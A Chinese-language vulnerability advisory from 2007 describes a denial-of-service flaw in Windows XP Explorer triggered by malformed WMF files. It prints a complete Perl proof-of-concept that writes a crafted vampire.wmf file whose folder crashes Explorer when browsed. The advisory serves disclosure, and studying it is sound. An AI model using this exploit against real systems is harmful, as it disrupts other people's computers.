Microsoft Windows资源管理器WMF文件拒绝服务漏洞
发布日期:2007-01-10
更新日期:2007-01-11
受影响系统:Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows XP
描述:
BUGTRAQ ID:
21992
Microsoft Windows是微软发布的非常流行的操作系统。
Windows在处理畸形WMF文件时存在拒绝服务漏洞,资源管理器在处理包含畸形文件的目录时会发生崩溃。
<*来源:Orbital (
orbital_q3nius@yahoo.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
# WMF 0-day Dos Exploit
# Exploit Coded by Vampire (Form Iran)
# Contact :
Vampire_Chiristof@yahoo.com
# Bug Found by Orbital
# Gr33tz To : Spy , l0pht.blackhat , Samir , Scorpino y4nliz and All Iranian Hackers and Programmers !!!
# Contact :
orbital_q3nius@yahoo.com
# Coded In Perl , PHP , Python
# the C version written but Still priv8
print "\nWMF Denial of Service Exploit by Vampire in PHP , PERL , PYTHON , C";
print "\n\nGenerating vampire.wmf...";
open(WMF, ">./vampire.wmf") or die "Cannot Create WMF File !\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nNow Try To Browse Folder In XP Explorer And Wait !!!\n";
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/浏览次数:3101
严重程度:0(网友投票)
